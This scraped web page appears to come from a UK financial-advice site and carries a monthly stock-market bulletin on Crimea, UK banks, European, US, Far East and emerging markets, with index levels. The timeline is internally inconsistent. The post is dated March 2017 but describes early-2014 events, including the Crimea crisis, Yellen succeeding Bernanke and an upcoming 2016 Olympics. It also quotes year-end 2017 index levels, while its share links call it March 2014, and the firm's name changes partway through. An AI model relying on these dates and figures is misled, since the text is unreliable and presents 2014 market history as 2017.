class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-8579\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8579 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">At Retirement&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-8599\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-8599\"><a href=\"../best-annuity-rates/\"><span class=\"fusion-megamenu-bullet\"/>Annuities</a></li>&#13;\n		<li id=\"menu-item-8580\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8580\"><div class=\"fusion-megamenu-widgets-container\"><div id=\"wooslider_slideshow_posts-2\" class=\"widget widget_wooslider_slideshow_posts\"><div id=\"wooslider-id-1\" class=\"wooslider wooslider-id-1 wooslider-type-posts wooslider-theme-default\"><ul class=\"slides\"><li class=\"slide\">&#13;\n<div class=\"layout-text-left overlay-none\"><a href=\"http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\"/><div class=\"slide-excerpt\"><h2 class=\"slide-title\"><a href=\"../better-pension-drawdown-annuity/\">Which is Better Pension Drawdown or Annuity?</a></h2></div></div></li>&#13;\n</ul></div>&#13;\n</div></div></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">For Business&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-8624\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8624 fusion-megamenu-menu\"><a>Other Services</a>&#13;\n&#13;\n</li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"../category/video-2/\">Watch Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8732\"><a href=\"../pension-reforms-offer-freedom-savers/\">Pension Reforms Offer Freedom to Savers</a></li>&#13;\n		<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8771\"><a href=\"../staging-date-social-advisors/\">When is your Staging Date?</a></li>&#13;\n		<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8781\"><a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a></li>&#13;\n		<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8780\"><a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"../our-blog/\">Read Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"../category/annuities/\">Annuities</a></li>&#13;\n		<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8588\"><a href=\"../category/insurance-protection/\">Insurance Protection</a></li>&#13;\n		<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8589\"><a href=\"../category\">Investments</a></li>&#13;\n		<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8590\"><a href=\"../category/pensions/\">Pensions</a></li>&#13;\n		<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8591\"><a href=\"../category/\">Trusts</a></li>&#13;\n		<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-8592\"><a href=\"../category/wealth-management/\">Wealth Management</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Stock Market Bulletin – March 2017										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/wealth-management/\" title=\"Wealth Management\">Wealth Management</a></li><li>Stock Market Bulletin – March 2017</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		<div id=\"content\" class=\"full-width\" style=\"width:100%\">&#13;\n										<div id=\"post-7683\" class=\"post-7683 post type-post status-publish format-standard has-post-thumbnail hentry category-wealth-management post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">Stock Market Bulletin – March 2017</span>&#13;\n						<div class=\"post-content\">&#13;\n				<div class=\"wpb_row vc_row-fluid\"> &#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<h2 style=\"text-align: left;\"> </h2>&#13;\n<h1 style=\"text-align: left;\">Stock Market Bulletin</h1>&#13;\n<h3 style=\"text-align: left;\">March 6th 2017 – Reading time 6 minutes&#13;\n&#13;\n		</h3></div> &#13;\n	</div>  <div class=\"vc_separator wpb_content_element vc_el_width_100\">&#13;\n	<span class=\"vc_sep_holder vc_sep_holder_l\"><span class=\"vc_sep_line\"/></span>&#13;\n		<span class=\"vc_sep_holder vc_sep_holder_r\"><span class=\"vc_sep_line\"/></span>&#13;\n</div>&#13;\n&#13;\n &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<p>A very warm welcome to what will be a regular series of month end stock market bulletins from Equity SMART.</p>&#13;\n<p>In these bulletins we’ll look at political and economic news from around the world, and report on the movement of the major stock markets. We’ll try and make them easy to read, informative and entertaining – and occasionally, even moderately amusing.</p>&#13;\n<p>Please note that neither this bulletin nor any of the following Equity SMART Bulletins is intended to give specific financial planning advice. They are simply meant as a helpful guide for our clients and potential clients – a five minute summary of the important events from the previous month and an indication of how world markets are performing.</p>&#13;\n<p>The figures quoted for the various stock market indices are accurate as at the last trading day of the relevant month. Inevitably (especially when there are dramatic events in the early part of a month) the indices may be at different levels by the time you read the Bulletins.</p>&#13;\n<p>And, of course, should you have any questions on any of the points made in the bulletin – or on any aspect of financial planning – then please don’t hesitate to contact us.</p>&#13;\n<p>Right, let’s get started…</p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid\"> &#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<h1 style=\"text-align: center;\"><b style=\"line-height: 1.5em;\">Introduction</b></h1>&#13;\n<p/>&#13;\n<h4/>&#13;\n<h4/>&#13;\n<p>And sadly we have to start in the Ukraine.</p>&#13;\n<p>There’s an old saying (which a lot of journalists who really should know better are now claiming as their<span style=\"font-size: 1em; line-height: 1.5em;\"> own):</span></p>&#13;\n<p><i style=\"line-height: 1.5em;\">“Russia</i><i style=\"line-height: 1.5em;\"> without Ukraine is a country. Russia with Ukraine is an empire.”</i></p>&#13;\n<p><span style=\"line-height: 1.5em;\">With Russia having de-facto annexed the Crimean Peninsula and the commander of the Black Sea Fleet busy issuing ultimatums, you could currently be forgiven for thinking that Vladimir Putin has decided to re-create the Russian empire.</span></p>&#13;\n<p>At the time of writing (Tuesday March 4<sup>th</sup>) William Hague, John Kerry and various European foreign secretaries are shuttling backwards and forwards desperately trying to find a diplomatic solution to the problem: hopefully by the time you read this they will have succeeded.</p>&#13;\n<p>Somehow a compromise will have to be found. Putin is unlikely to give up his claims on the Crimea and the Black Sea ports – but the Ukraine has its troops on full alert, with acting President Oleksandr Turchynov declaring,</p>&#13;\n<p>“The Ukraine will protect all its citizens no matter which region they live in and which language they speak or which church they attend.”</p>&#13;\n<p>Whatever the outcome, the dispute – and the threatened sanctions against Russia and Russian citizens – are likely to impact on the economies and stock markets of the region for months to come. This was evidenced on the morning of March 3<sup>rd</sup>, when the potential sanctions saw the Russian stock market fall by 9%.</p>&#13;\n<p>Away from the Ukraine most of the major stock markets enjoyed a good month, more than making up for the falls in January. The UK, German and US Dow Jones index were all well ahead in the month, as were Hong Kong and India.</p>&#13;\n<p style=\"text-align: center;\"><span style=\"color: #808080;\">_________________________</span></p>&#13;\n<h4/>&#13;\n<h1 style=\"text-align: center;\"><b style=\"line-height: 1.5em;\">United Kingdom</b></h1>&#13;\n<h4/>&#13;\n<blockquote>&#13;\n<h4><i style=\"line-height: 1.5em;\">The FTSE-100 index of the UK’s leading shares closed February at 6,810. That was a rise of 5% in the month and it sees the index slightly ahead of the 6,749 level at which it ended 2017. It also means that the FTSE is now within sight of its all time high of 6,930 – which was achieved in the dim and distant days of December 1999.</i></h4>&#13;\n</blockquote>&#13;\n<h4/>&#13;\n<p>You don’t need to follow the financial news every day to know that the UK high street has taken a battering over recent years, assailed by out of town shopping and the ruthless efficiency of Amazon.</p>&#13;\n<p>But there was at least one success story in February when Poundland – apparently the new favourite shop of the hard-pressed middle classes – announced plans to float on the stock market with a valuation of £800m. (I should declare an interest here: I don’t believe my children can tell the difference between sweets at £1 a packet and £3 a packet…)</p>&#13;\n<p>There was also good news (of a sort) in the banking sector, as Lloyds confirmed that it may soon start paying dividends again for the first time since its near-collapse in 2008. Expect the Treasury to start gearing up for a share sale to the general public any time now.</p>&#13;\n<p>Sadly the price of this was Lloyds setting aside another large slice of cash to compensate victims of PPI mis-selling, taking the total bill for this ‘best advice’ close to £10bn.</p>&#13;\n<p>RBS also turned in some impressive figures, posting a loss of £8bn. Bankers being bankers they deemed this a perfectly acceptable reason to pay out £580m in staff bonuses.</p>&#13;\n<p>The UK construction sector had a good month, growing at its fastest rate since the financial crisis began. The Purchase Managers Index was up to 64.6 in January, from 62.1 in December, with confidence at the highest level since September 2009.</p>&#13;\n<p>Data firm Markit reported that “greater access to finance” had led to more new business and constantly increasing levels of employment in the sector. Perhaps not surprisingly, the average price of a house in the UK rose in December – up 0.9% to £250,000.</p>&#13;\n<h2 style=\"text-align: left;\">A Word on <span style=\"color: #000000;\">Scottish</span> Independence</h2>&#13;\n<p><span style=\"line-height: 1.5em;\">Meanwhile, the debate regarding Scottish independence rumbled on, with David Cameron and Alex Salmond holding cabinet meetings a few miles apart in Aberdeen. No, they did not meet for drinks and a sandwich…</span></p>&#13;\n<p>George Osborne made a very strong speech in Edinburgh pointing out that an independent Scotland would not be allowed to keep the pound, and European Commission Chief Juan Manuel Baroso also stated that it would be “very difficult” for Scotland to join the EU in the event of a ‘yes’ vote.</p>&#13;\n<p>‘No’ remains the firm favourite with the bookmakers, but the gap in polling intentions has narrowed appreciably over the past few months.</p>&#13;\n<p style=\"text-align: center;\">_________________________</p>&#13;\n<p> </p>&#13;\n<h1 style=\"text-align: center;\"/>&#13;\n<h1 style=\"text-align: center;\"><b>Europe</b><b> </b></h1>&#13;\n<p><b> </b></p>&#13;\n<blockquote>&#13;\n<h4><i>The two major stock indices in Europe are the German DAX index and the French CAC-40 index. These two indices did particularly well in 2017, rising by 25% and 18% respectively. Both slipped back in January of this year, but the DAX closed February at 9,692 – up 4% in the month – and the French index was up 6% to end February at 4,408.</i><span style=\"line-height: 1.5em;\"> </span></h4>&#13;\n</blockquote>&#13;\n<p>Whatever the rhetoric coming out of Washington, events in the Ukraine are clearly going to impact Europe far more than the US. As someone pointed out, ‘refugees are going to arrive in Berlin, not in New York.’</p>&#13;\n<p>Economic news released in Germany through February was almost all good, with the inflation rate down to 1.2% (largely due to lower energy prices), and figures for January also confirming a fall in unemployment – down to 5%, with youth unemployment also falling slightly to 7.6%.</p>&#13;\n<p>It was confirmed that German GDP had expanded by 0.4% in the last quarter by 2017, largely on the back of foreign trade as domestic demand remained week. This was up from the 0.3% in the previous quarter and slightly ahead of expectations.</p>&#13;\n<p><span style=\"line-height: 1.5em;\">There was also good news in France, where household demand pushed the French GDP up by 0.3% in the final quarter. The French trade deficit fell by €6bn to €61.2bn in 2017, the lowest level since 2010 as imports fell faster than exports.</span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">There was even good news for the beleaguered Spanish economy, as it recorded a second consecutive quarter of growth – 0.2% in the final quarter of 2017, to follow 0.1% in the third quarter. The figures may not look hugely impressive, but they are at least dos pasos en la direccion correcta…</span></p>&#13;\n<p style=\"text-align: center;\">_________________________</p>&#13;\n<p><a href=\"#\"/></p>&#13;\n<h1 style=\"text-align: center;\"><b>USA</b><b/></h1>&#13;\n<blockquote><p>&#13;\n<b> </b><i>As most people know the main stock market index in the US is the Dow Jones Index, which did well in 2017 finishing the year at 16,577 for a rise of 27%. It closed February at 16,322 rising 4% in the month, having fallen by approximately 5% in January.</i>&#13;\n</p></blockquote>&#13;\n<p><span style=\"line-height: 1.5em;\">The month in America started with the return of an old friend – yes, the country was once again on the verge of running out of cash. Treasury Secretary Jack Tew issued an urgent call for Congress to raise the borrowing limit, a move seen as putting pressure on the Republicans.</span></p>&#13;\n<p> Meanwhile Janet Yelland replaced Ben Bernanke, becoming the first woman to chair the Federal Reserve – she is very much expected to continue with the policies of her predecessor.</p>&#13;\n<p> Away from the nation’s policymakers the news was generally good, with the US manufacturing sector accelerating in February and figures for January confirming a rise in personal spending.</p>&#13;\n<p>The Consumer Sentiment Index improved in February, showing that most Americans are feeling confident about the future. This was reflected in the sales of new homes, which jumped to a 5½ year high.</p>&#13;\n<p> Early figures had given the US a stellar rise of 3.2% in GDP for the last quarter of 2017. This was subsequently revised down to 2.4% but as noted above, the Dow Jones index took the news in its stride.</p>&#13;\n<p style=\"text-align: center;\">_________________________</p>&#13;\n<p> </p>&#13;\n<h1 style=\"text-align: center;\"/>&#13;\n<h1 style=\"text-align: center;\"><b>Far East</b><b/></h1>&#13;\n<p><b> </b></p>&#13;\n<blockquote><p>&#13;\n<i>We’ll be reporting on four of the major Far Eastern stock markets in the bulletin – China, Japan, Hong Kong and South Korea. Hong Kong was the star performer of the four in February, with a gain of 4% to finish at 22,837. South Korea was up 2% at 1,980 and China inched ahead to 2,056. The Japanese market fell by 74 points to end the month at 14,841 – that said, the Japanese market did rise by over 50% in 2017. </i>&#13;\n</p></blockquote>&#13;\n<p/>&#13;\n<p>The Chinese economic juggernaut rumbled on, with GDP growing by a further 1.8% in the final quarter of 2017. Figures released for January showed a trade surplus of $31.9bn with exports up 10.6% on the previous year and imports up 10%. (As a comparison, the latest figures from the US showed a $38.7bn trade <i>deficit</i>.)</p>&#13;\n<p>Inflation remained steady at 2.5%, although Chinese bank lending jumped more than expected in January and as a result the People’s Bank ‘drained’ $8bn out of the system in February to curb any danger of excessive lending.</p>&#13;\n<p>There was a much less rosy picture in Japan, with a trade deficit of 2.79tn Yen in January, well up on the same month in the previous year. In contrast to China the Bank of Japan extended its loan support programme as it sought to stimulate bank borrowing.</p>&#13;\n<p>Both Hong Kong and South Korea confirmed increases in GDP for the final quarter, with South Korea in particular continuing to benefit from rising exports.</p>&#13;\n<p style=\"text-align: center;\">_________________________</p>&#13;\n<h1 style=\"text-align: center;\"/>&#13;\n<h1 style=\"text-align: center;\"><b>Emerging Markets </b></h1>&#13;\n<p> </p>&#13;\n<blockquote><p>&#13;\n<i>The bulletin will focus on three of the major emerging markets – India, Russia and Brazil – as well as looking at other notable performances from the smaller emerging markets. </i>&#13;\n</p></blockquote>&#13;\n<p> The best performance amongst the major emerging markets came from India, with the stock market rising 3% to end February at 21,120, although GDP growth was below expectations and the Reserve Bank also raised interest rates to 8% to try and curb persistently high inflation.</p>&#13;\n<p>The markets in Brazil and Russia were both slightly down in February – Brazil finishing the month at 47,094 and Russia at 1,445. The Russian market obviously fell further in early March following the incursion into the Crimea.</p>&#13;\n<p>Anyone reading the news will be aware of the problems Brazil faces ahead of the World Cup this year and the Olympics in 2016. These problems seem to be reflected in the stock market at the moment, as it is well down from the peaks of 65,000 which it scaled in 2017.</p>&#13;\n<p>And as noted above, the situation in the Ukraine and the continuing threat of sanctions is going to impact on the Russian economy and stock market for the immediate future.</p>&#13;\n<p>Then again, by the time you read this the diplomats may have succeeded. As the Chinese saying goes, ‘May you live in interesting times…’</p>&#13;\n<p><b>And finally…</b></p>&#13;\n<p>We mentioned the doom and gloom on the high street earlier in the bulletin. However, exactly the opposite is apparently true in the Ferrari showrooms of our nation, with the luxury car maker confirming that more Ferraris are sold in the UK than anywhere else in Europe.</p>&#13;\n<p>Despite the cars costing a minimum of £151,000 Ferrari said 677 cars were delivered to the UK in 2017 as the country overtook Germany as the leading European market.</p>&#13;\n<p>I hope you’ve enjoyed this first edition of the Equity SMART Bulletin. I’ll be back in early April with all the news for March – sadly in a rather more down-market vehicle…</p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></span><span class=\"sep\">|</span>Categories: <a href=\"../category/wealth-management/\" title=\"View all posts in Wealth Management\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a href=\"../march-stock-market-bulletin/\" title=\"Comment on Stock Market Bulletin – March 2014\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/march-stock-market-bulletin/&amp;p[title]=Stock%20Market%20Bulletin%20%E2%80%93%20March%202014\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=Stock+Market+Bulletin+-+March+2014%20http://www.equalitywalk.org.uk/march-stock-market-bulletin/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/march-stock-market-bulletin/&amp;title=Stock%20Market%20Bulletin%20%E2%80%93%20March%202014\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/march-stock-market-bulletin/&amp;title=Stock%20Market%20Bulletin%20%E2%80%93%20March%202014\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fmarch-stock-market-bulletin%2F&amp;name=Stock+Market+Bulletin+-+March+2014&amp;description=A+very+warm+welcome+to+what+will+be+a+regular+series+of+month+end+stock+market+bulletins+from+Reid+Scott+Ross%2C+reporting+on+the+movement+of+the+major+stock+markets.+\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/march-stock-market-bulletin/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"#\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=Stock Market Bulletin – March 2014&amp;body=http://www.equalitywalk.org.uk/march-stock-market-bulletin/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\"/>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../march-stock-market-bulletin/\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\" class=\"comment-form\">&#13;\n																										<div id=\"comment-input\"><input type=\"text\" name=\"author\" id=\"author\" value=\"\" placeholder=\"Name (required)\" size=\"22\" tabindex=\"1\" aria-required=\"true\" class=\"input-name\"/><input type=\"text\" name=\"email\" id=\"email\" value=\"\" placeholder=\"Email (required)\" size=\"22\" tabindex=\"2\" aria-required=\"true\" class=\"input-email\"/></div>&#13;\n												<div id=\"comment-textarea\"/>												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"comment-submit\" value=\"Post Comment\"/><input type=\"hidden\" name=\"comment_post_ID\" value=\"7683\" id=\"comment_post_ID\"/></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"cadc25358a\"/></p>&#13;\n<p style=\"display: none;\"><input type=\"hidden\" id=\"ak_js\" name=\"ak_js\" value=\"168\"/></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"display:none\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div 